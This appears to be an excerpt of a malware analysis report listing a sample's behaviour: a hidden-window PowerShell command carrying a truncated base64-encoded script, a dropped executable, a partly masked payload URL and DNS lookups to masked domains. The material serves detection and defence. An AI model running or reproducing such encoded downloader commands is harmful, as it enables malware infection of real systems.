Technical information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABOAGQAZwBrAGYAdgBtAHMAcgBrAD0AJwBDAHUAawBuAG4AYgB4AG0AbQBuAHEAZgBrACcAOwAkAFQAdgB3AHcAdwB5AG4AbgAgAD...
- %HOMEPATH%\464.exe
- http://se###uyen.com/gieorisj2ke/ltCIlPEpE/
- DNS ASK se###uyen.com
- DNS ASK mo#####acebookvn.com
- DNS ASK wa##sky.com
- DNS ASK wi#####d.wpmudev.host
- DNS ASK pl###heme.ir
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABOAGQAZwBrAGYAdgBtAHMAcgBrAD0AJwBDAHUAawBuAG4AYgB4AG0AbQBuAHEAZgBrACcAOwAkAFQAdgB3AHcAdwB5AG4AbgAgAD...' (with hidden window)